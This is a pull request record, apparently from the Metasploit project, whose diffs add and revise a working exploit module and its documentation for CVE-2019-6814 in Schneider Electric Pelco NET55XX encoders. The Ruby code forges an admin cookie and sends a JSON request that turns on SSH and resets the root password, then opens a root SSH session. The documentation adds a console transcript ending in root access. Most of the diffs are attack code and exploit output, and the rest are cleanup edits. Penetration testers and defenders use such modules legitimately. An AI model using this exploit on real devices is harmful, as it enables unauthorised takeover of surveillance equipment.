### PR TITLE
Add for Schneider Electric NET55XX Encoder (CVE -2019 -6814) 

### DIFF
--- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md
+++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md
@@ -17,7 +17,7 @@ Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET55
 
 ## Options
 
-This module can be as simple as setting the RHOST and NEW_PASSWORD option, and you're ready to go.
+This module can be as simple as setting the `RHOST` and `NEW_PASSWORD` option, and you're ready to go.
 
 **NEW_PASSWORD**  
 

--- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md
+++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-Schneider Eletric Pelco NET55XX Encoder (CVE 2019-6814)
+Schneider Electric Pelco NET55XX Encoder (CVE 2019-6814)
 
 Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550).
  This module exploits an inadequate access control vulnerability creating a malicious json request to`the webUI encoder, thus allowing the SSH service to be enabled and changing the root password.

--- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md
+++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md
@@ -21,7 +21,7 @@ This module can be as simple as setting the RHOST and NEW_PASSWORD option, and y
 
 **NEW_PASSWORD**  
 
-You should  set a new ssh password to the vulnerable device.
+You should set a new SSH password to the vulnerable device.
 
 
 ## Scenarios

--- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md
+++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md
@@ -1,0 +1,48 @@
+## Vulnerable Application
+
+Schneider Eletric Pelco NET55XX Encoder (CVE 2019-6814)
+
+Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550).
+ This module exploits an inadequate access control vulnerability creating a malicious json request to`the webUI encoder, thus allowing the SSH service to be enabled and changing the root password.
+
+## Verification Steps
+
+- [ ] Start `msfconsole`
+- [ ] `use  use exploit/linux/http/schneider_eletric_net55xx_encoder`
+- [ ] `set RHOSTS [rhosts]`
+- [ ] `set RPORT [rport]`
+- [ ] `set NEW_PASSWORD [new password]`
+- [ ] `exploit`
+- [ ] Verify you get a root shell
+
+## Options
+
+This module can be as simple as setting the RHOST and NEW_PASSWORD option, and you're ready to go.
+
+**NEW_PASSWORD**  
+
+You should  set a new ssh password to the vulnerable device.
+
+
+## Scenarios
+
+**Schneider Electric Pelco Encoder NET5501-XT**
+
+msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RHOSTS 192.168.34.2
+RHOSTS  => 192.168.34.2
+msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RPORT 80
+RPORT  => 80
+msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set NEW_PASSWORD msfrapid7
+NEW_PASSWORD => msfrapid7
+msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > run
+
+[] 192.168.34.2:22 - Attempt to start a SSH connection...
+[] 192.168.34.2:80 - Attempt to change the root password...
+[+] 192.168.34.2:80 - Successfully changed the root password...
+[+] 192.168.34.2:22 - Session established
+[] Found shell.
+[] Command shell session 1 opened (192.168.34.3:37033 -> 192.168.34.2:22) at 2019-07-03 10:57:07 -0400
+
+uname -a;id
+Linux NET5501-XT-K61200103 2.6.37 #1 PREEMPT Fri Aug 8 04:33:08 KST 2014 armv7l unknown
+uid=0(root) gid=0(root) groups=0(root)

--- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md
+++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md
@@ -8,7 +8,7 @@ Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET55
 ## Verification Steps
 
 - [ ] Start `msfconsole`
-- [ ] `use  use exploit/linux/http/schneider_eletric_net55xx_encoder`
+- [ ] `use  use exploit/linux/http/schneider_electric_net55xx_encoder`
 - [ ] `set RHOSTS [rhosts]`
 - [ ] `set RPORT [rport]`
 - [ ] `set NEW_PASSWORD [new password]`

--- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md
+++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md
@@ -3,7 +3,7 @@
 Schneider Electric Pelco NET55XX Encoder (CVE 2019-6814)
 
 Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550).
- This module exploits an inadequate access control vulnerability creating a malicious json request to`the webUI encoder, thus allowing the SSH service to be enabled and changing the root password.
+ This module exploits an inadequate access control vulnerability creating a malicious JSON request to the `webUI` encoder, thus allowing the SSH service to be enabled and changing the root password.
 
 ## Verification Steps
 

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -15,10 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => "Schneider Electric Pelco Endura NET55XX Encoder",
       'Description'    => %q{
-        This module exploits an inadequate access control vulnerability creating a malicious
-        json request to the webUI encoder, thus allowing the SSH service to be enabled , and
-        changing the root password. This module has been tested sucessfully on: NET5501,
-        NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions.
+         This module exploits inadequate access controls within the webUI to enable the SSH service and change the root password. 
+         This module has been tested sucessfully on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -109,8 +109,8 @@ class MetasploitModule < Msf::Exploit::Remote
     xmlResponse = resp.join(',')
     disconnect_udp
 
-    if xmlResponse.include? "NET5501" or xmlResponse.include? "NET5501-I" or xmlResponse.include? "NET5501-XT" or xmlResponse.include? "NET5504" or xmlResponse.include? "NET5500" or xmlResponse.include? "NET5516" or xmlResponse.include? "NET5508"
-       return Exploit::CheckCode::Appears
+    if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508")
+	  return Exploit::CheckCode::Appears
     end
        Exploit::CheckCode::Safe
   end

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -63,21 +63,11 @@ class MetasploitModule < Msf::Exploit::Remote
       ]
     )
   end
-
-
-  def rhost
-    datastore['RHOST']
-  end
-
-  def rport
-    datastore['RPORT']
-  end
-
+	
   def new_password
     datastore['NEW_PASSWORD']
   end
-
-
+	
   def check
     xmlPayload = '<?xml version="1.0" encoding="UTF-8"?>'\
 			'<Envelope xmlns="http://www.w3.org/2003/05/soap-envelope">'\
@@ -101,7 +91,6 @@ class MetasploitModule < Msf::Exploit::Remote
     resp << udp_sock.get(datastore['TIMEOUT'])
     xmlResponse = resp.join(',')
     disconnect_udp
-
     if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508")
 	  return Exploit::CheckCode::Appears
     end
@@ -139,13 +128,11 @@ class MetasploitModule < Msf::Exploit::Remote
       :non_interactive => true,
       :verify_host_key => :never
     }
-
     opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
-
     begin
       ssh = nil
       ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
-        ssh = Net::SSH.start(rhost, 'root', opts)
+        ssh = Net::SSH.start(datastore['RHOST'], 'root', opts)
       end
     rescue Rex::ConnectionError
       return nil
@@ -162,15 +149,12 @@ class MetasploitModule < Msf::Exploit::Remote
       print_error "#{rhost}:22 SSH Error: #{e.class} : #{e.message}"
       return nil
     end
-
     if ssh
       conn = Net::SSH::CommandStream.new(ssh)
       return conn
     end
-
     return nil
   end
-
 
   def exploit
     conn = do_login

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -19,8 +19,6 @@ class MetasploitModule < Msf::Exploit::Remote
         json request to the webUI encoder, thus allowing the SSH service to be enabled , and
         changing the root password. This module has been tested sucessfully on: NET5501,
         NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions.
-
-
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -115,8 +113,8 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
   def do_login
-    print_status("#{rhost}:22 - Attempt to start a SSH connection...")
     change_password
+    print_status("#{rhost}:22 - Attempt to start a SSH connection...")
     factory = ssh_socket_factory
     opts = {
       :auth_methods    => ['password', 'keyboard-interactive'],
@@ -135,25 +133,19 @@ class MetasploitModule < Msf::Exploit::Remote
         ssh = Net::SSH.start(datastore['RHOST'], 'root', opts)
       end
     rescue Rex::ConnectionError
-      return nil
     rescue Net::SSH::Disconnect, ::EOFError
       print_error "#{rhost}:22 SSH - Disconnected during negotiation"
-      return nil
     rescue ::Timeout::Error
       print_error "#{rhost}:22 SSH - Timed out during negotiation"
-      return nil
     rescue Net::SSH::AuthenticationFailed
       print_error "#{rhost}:22 SSH - Failed authentication"
-      return nil
     rescue Net::SSH::Exception => e
       print_error "#{rhost}:22 SSH Error: #{e.class} : #{e.message}"
-      return nil
     end
     if ssh
       conn = Net::SSH::CommandStream.new(ssh)
       return conn
     end
-    return nil
   end
 
   def exploit

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account']),
+        OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account', Rex::Text.rand_text_alphanumeric(16)]),
         OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10])
       ]
     )

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -1,0 +1,188 @@
+﻿##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'net/ssh/command_stream'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Udp
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::SSH
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Schneider Electric Pelco Endura NET55XX Encoder",
+      'Description'    => %q{
+        This module exploits an inadequate access control vulnerability creating a malicious
+        json request to the webUI encoder, thus allowing the SSH service to be enabled , and
+        changing the root password. This module has been tested sucessfully on: NET5501,
+        NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions.
+
+
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Lucas Dinucci <idntk.lucdin@gmail.com>',
+          'Vitor Esperança <vitor@machiaveliclabs.com>'
+
+        ],
+      'References'     =>
+        [
+          ['CVE', '2019-6814'],
+          ['URL', 'https://www.schneider-electric.com/en/download/document/SEVD-2019-134-01/']
+        ],
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Payload'        =>
+        {
+          'Compat' => {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find'
+          }
+        },
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'     => [ [ "Universal", {} ] ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Jan 25 2019",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RHOST(),
+        Opt::RPORT(80),
+        OptString.new('USER_AGENT',  [ true,  "User-Agent to send with requests", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"]),
+        OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account']),
+        OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10])
+      ], self.class
+    )
+
+    register_advanced_options(
+      [
+        OptInt.new('UDP_PORT', [ true, 'UDP port for the ONVIF service', 3702]),
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
+    )
+  end
+
+
+  def rhost
+    datastore['RHOST']
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+  def new_password
+    datastore['NEW_PASSWORD']
+  end
+
+
+  def check
+    xmlPayload = '<?xml version="1.0" encoding="UTF-8"?><Envelope xmlns="http://www.w3.org/2003/05/soap-envelope"><Header xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"><a:Action mustUnderstand="1">http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe</a:Action><a:MessageID>uuid:f3d577a3-431f-4450-ab45-b480042b9c74</a:MessageID><a:ReplyTo><a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><a:To mustUnderstand="1">urn:schemas-xmlsoap-org:ws:2005:04:discovery</a:To></Header><Body><Probe xmlns="http://schemas.xmlsoap.org/ws/2005/04/discovery"><Types xmlns:dp0="http://www.onvif.org/ver10/network/wsdl">dp0:NetworkVideoTransmitter</Types></Probe></Body></Envelope><?xml version="1.0" encoding="UTF-8"?>'
+    connect_udp(true, {'RPORT' => datastore['UDP_PORT']})
+    udp_sock.put(xmlPayload)
+    resp = []
+    resp << udp_sock.get(datastore['TIMEOUT'])
+    xmlResponse = resp.join(',')
+    disconnect_udp
+
+    if xmlResponse.include? "NET5501" or xmlResponse.include? "NET5501-I" or xmlResponse.include? "NET5501-XT" or xmlResponse.include? "NET5504" or xmlResponse.include? "NET5500" or xmlResponse.include? "NET5516" or xmlResponse.include? "NET5508"
+       return Exploit::CheckCode::Appears
+    end
+       return Exploit::CheckCode::Safe
+  end
+
+  def change_password
+    print_status("#{rhost}:80 - Attempt to change the root password...")
+    headers = {}
+    headers['Cookie'] = 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647'
+    headers['Content-Type'] = 'application/json;charset=utf-8'
+    headers['Connection'] = 'keep-alive'
+    headers['Accept'] = 'application/json, text/plain, */*'
+    headers['Accept-Language'] = 'en-US,en;q=0.5'
+    headers['Accept-Encoding'] = 'gzip, deflate, br'
+    headers['Cache-Control'] = 'no-cache'
+    headers['Pragma'] = 'no-cache'
+    headers['Content-Lenght'] = '47'
+    headers['Referer'] = normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh?timestamp=1544700034214')
+    headers['User-Agent'] = datastore['USER_AGENT']
+
+    post = "{\"enable\":true,\"passwd\":\"#{new_password}\",\"userid\":\"root\"}"
+    login = send_request_cgi({
+      'method' => 'POST',
+      'uri' =>  normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh?timestamp=1544700034214'),
+      'data' => post,
+      'headers' => headers,
+    }, timeout=datastore['TIMEOUT'])
+
+    if !login or login.code != 200
+      fail_with(Failure::UnexpectedReply, "Failed to change root password")
+    end
+    print_good("#{rhost}:80 - Successfully changed the root password...")
+    end
+
+  def do_login
+    print_status("#{rhost}:22 - Attempt to start a SSH connection...")
+    change_password
+    factory = ssh_socket_factory
+    opts = {
+      :auth_methods    => ['password', 'keyboard-interactive'],
+      :port            => 22,
+      :use_agent       => false,
+      :config          => true,
+      :password        => new_password,
+      :proxy           => factory,
+      :non_interactive => true,
+      :verify_host_key => :never
+    }
+
+    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+
+    begin
+      ssh = nil
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh = Net::SSH.start(rhost, 'root', opts)
+      end
+    rescue Rex::ConnectionError
+      return nil
+    rescue Net::SSH::Disconnect, ::EOFError
+      print_error "#{rhost}:22 SSH - Disconnected during negotiation"
+      return nil
+    rescue ::Timeout::Error
+      print_error "#{rhost}:22 SSH - Timed out during negotiation"
+      return nil
+    rescue Net::SSH::AuthenticationFailed
+      print_error "#{rhost}:22 SSH - Failed authentication"
+      return nil
+    rescue Net::SSH::Exception => e
+      print_error "#{rhost}:22 SSH Error: #{e.class} : #{e.message}"
+      return nil
+    end
+
+    if ssh
+      conn = Net::SSH::CommandStream.new(ssh)
+      return conn
+    end
+
+    return nil
+  end
+
+
+  def exploit
+    conn = do_login
+    if conn
+      print_good("#{rhost}:22 - Session established ")
+      handler(conn.lsock)
+    end
+  end
+end

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -56,7 +56,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        Opt::RPORT(80),
         OptString.new('USER_AGENT',  [ true,  "User-Agent to send with requests", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"]),
         OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account']),
         OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10])

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -14,9 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def initialize(info={})
     super(update_info(info,
       'Name'           => "Schneider Electric Pelco Endura NET55XX Encoder",
-      'Description'    => %q{
-       This module exploits inadequate access controls within the webUI to enable the SSH service and change the root password. 
-       This module has been tested sucessfully on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions.
+      'Description'    => %q{This module exploits inadequate access controls within the webUI to enable the SSH service and change the root password. This module has been tested sucessfully on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -108,6 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200
     print_good("#{rhost}:80 - Successfully changed the root password...")
+    print_good("#{rhost}:80 - New credentials: User: root / Password: #{new_password}")
   end
 
   def do_login

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
     xmlResponse = resp.join(',')
     disconnect_udp
     if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508")
-	  return Exploit::CheckCode::Appears
+      return Exploit::CheckCode::Appears
     end
        Exploit::CheckCode::Safe
   end

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
     headers = {}
     headers['Cookie'] = 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647'
     headers['Content-Type'] = 'application/json;charset=utf-8'
-    post = "{\"enable\":true,\"passwd\":\"#{new_password}\",\"userid\":\"root\"}"
+    post = {"enable": true, "passwd": new_password, "userid": "root"}.to_json
     login = send_request_cgi({
       'method' => 'POST',
       'uri' =>  normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'),

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account']),
         OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10])
-      ], self.class
+      ]
     )
 
     register_advanced_options(

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -110,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200
     print_good("#{rhost}:80 - Successfully changed the root password...")
-    end
+  end
 
   def do_login
     change_password

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508")
       return Exploit::CheckCode::Appears
     end
-       Exploit::CheckCode::Safe
+     CheckCode::Safe
   end
 
   def change_password

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -61,28 +61,28 @@ class MetasploitModule < Msf::Exploit::Remote
       ]
     )
   end
-	
+
   def new_password
     datastore['NEW_PASSWORD']
   end
-	
+
   def check
-    xmlPayload = '<?xml version="1.0" encoding="UTF-8"?>'\
-			'<Envelope xmlns="http://www.w3.org/2003/05/soap-envelope">'\
-			'<Header xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing">'\
-			'<a:Action mustUnderstand="1">http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe</a:Action>'\
-			'<a:MessageID>uuid:f3d577a3-431f-4450-ab45-b480042b9c74</a:MessageID>'\
-			'<a:ReplyTo>'\
-				'<a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>'\
-			'</a:ReplyTo>'\
-			'<a:To mustUnderstand="1">urn:schemas-xmlsoap-org:ws:2005:04:discovery</a:To>'\
-			'</Header>'\
-			'<Body>'\
-			'<Probe xmlns="http://schemas.xmlsoap.org/ws/2005/04/discovery">'\
-			'<Types xmlns:dp0="http://www.onvif.org/ver10/network/wsdl">dp0:NetworkVideoTransmitter</Types>'\
-			'</Probe>'\
-			'</Body>'\
-			'</Envelope><?xml version="1.0" encoding="UTF-8"?>'
+        xmlPayload = '<?xml version="1.0" encoding="UTF-8"?>'\
+'<Envelope xmlns="http://www.w3.org/2003/05/soap-envelope">'\
+'<Header xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing">'\
+'<a:Action mustUnderstand="1">http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe</a:Action>'\
+'<a:MessageID>uuid:f3d577a3-431f-4450-ab45-b480042b9c74</a:MessageID>'\
+'<a:ReplyTo>'\
+'<a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>'\
+'</a:ReplyTo>'\
+'<a:To mustUnderstand="1">urn:schemas-xmlsoap-org:ws:2005:04:discovery</a:To>'\
+'</Header>'\
+'<Body>'\
+'<Probe xmlns="http://schemas.xmlsoap.org/ws/2005/04/discovery">'\
+'<Types xmlns:dp0="http://www.onvif.org/ver10/network/wsdl">dp0:NetworkVideoTransmitter</Types>'\
+'</Probe>'\
+'</Body>'\
+'</Envelope><?xml version="1.0" encoding="UTF-8"?>'
     connect_udp(true, {'RPORT' => datastore['UDP_PORT']})
     udp_sock.put(xmlPayload)
     resp = []

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -56,7 +56,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        Opt::RHOST(),
         Opt::RPORT(80),
         OptString.new('USER_AGENT',  [ true,  "User-Agent to send with requests", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"]),
         OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account']),

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -86,7 +86,22 @@ class MetasploitModule < Msf::Exploit::Remote
 
 
   def check
-    xmlPayload = '<?xml version="1.0" encoding="UTF-8"?><Envelope xmlns="http://www.w3.org/2003/05/soap-envelope"><Header xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"><a:Action mustUnderstand="1">http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe</a:Action><a:MessageID>uuid:f3d577a3-431f-4450-ab45-b480042b9c74</a:MessageID><a:ReplyTo><a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><a:To mustUnderstand="1">urn:schemas-xmlsoap-org:ws:2005:04:discovery</a:To></Header><Body><Probe xmlns="http://schemas.xmlsoap.org/ws/2005/04/discovery"><Types xmlns:dp0="http://www.onvif.org/ver10/network/wsdl">dp0:NetworkVideoTransmitter</Types></Probe></Body></Envelope><?xml version="1.0" encoding="UTF-8"?>'
+    xmlPayload = '<?xml version="1.0" encoding="UTF-8"?>'\
+			'<Envelope xmlns="http://www.w3.org/2003/05/soap-envelope">'\
+			'<Header xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing">'\
+			'<a:Action mustUnderstand="1">http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe</a:Action>'\
+			'<a:MessageID>uuid:f3d577a3-431f-4450-ab45-b480042b9c74</a:MessageID>'\
+			'<a:ReplyTo>'\
+				'<a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>'\
+			'</a:ReplyTo>'\
+			'<a:To mustUnderstand="1">urn:schemas-xmlsoap-org:ws:2005:04:discovery</a:To>'\
+			'</Header>'\
+			'<Body>'\
+			'<Probe xmlns="http://schemas.xmlsoap.org/ws/2005/04/discovery">'\
+			'<Types xmlns:dp0="http://www.onvif.org/ver10/network/wsdl">dp0:NetworkVideoTransmitter</Types>'\
+			'</Probe>'\
+			'</Body>'\
+			'</Envelope><?xml version="1.0" encoding="UTF-8"?>'
     connect_udp(true, {'RPORT' => datastore['UDP_PORT']})
     udp_sock.put(xmlPayload)
     resp = []

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -128,9 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => headers,
     }, timeout=datastore['TIMEOUT'])
 
-    if !login or login.code != 200
-      fail_with(Failure::UnexpectedReply, "Failed to change root password")
-    end
+    fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200
     print_good("#{rhost}:80 - Successfully changed the root password...")
     end
 

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => "Schneider Electric Pelco Endura NET55XX Encoder",
       'Description'    => %q{
-         This module exploits inadequate access controls within the webUI to enable the SSH service and change the root password. 
-         This module has been tested sucessfully on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions.
+       This module exploits inadequate access controls within the webUI to enable the SSH service and change the root password. 
+       This module has been tested sucessfully on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -120,20 +120,10 @@ class MetasploitModule < Msf::Exploit::Remote
     headers = {}
     headers['Cookie'] = 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647'
     headers['Content-Type'] = 'application/json;charset=utf-8'
-    headers['Connection'] = 'keep-alive'
-    headers['Accept'] = 'application/json, text/plain, */*'
-    headers['Accept-Language'] = 'en-US,en;q=0.5'
-    headers['Accept-Encoding'] = 'gzip, deflate, br'
-    headers['Cache-Control'] = 'no-cache'
-    headers['Pragma'] = 'no-cache'
-    headers['Content-Lenght'] = '47'
-    headers['Referer'] = normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh?timestamp=1544700034214')
-    headers['User-Agent'] = datastore['USER_AGENT']
-
     post = "{\"enable\":true,\"passwd\":\"#{new_password}\",\"userid\":\"root\"}"
     login = send_request_cgi({
       'method' => 'POST',
-      'uri' =>  normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh?timestamp=1544700034214'),
+      'uri' =>  normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'),
       'data' => post,
       'headers' => headers,
     }, timeout=datastore['TIMEOUT'])

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def change_password
-    print_status("#{rhost}:80 - Attempt to change the root password...")
+    print_status("#{peer} - Attempt to change the root password...")
     headers = {}
     headers['Cookie'] = 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647'
     headers['Content-Type'] = 'application/json;charset=utf-8'

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
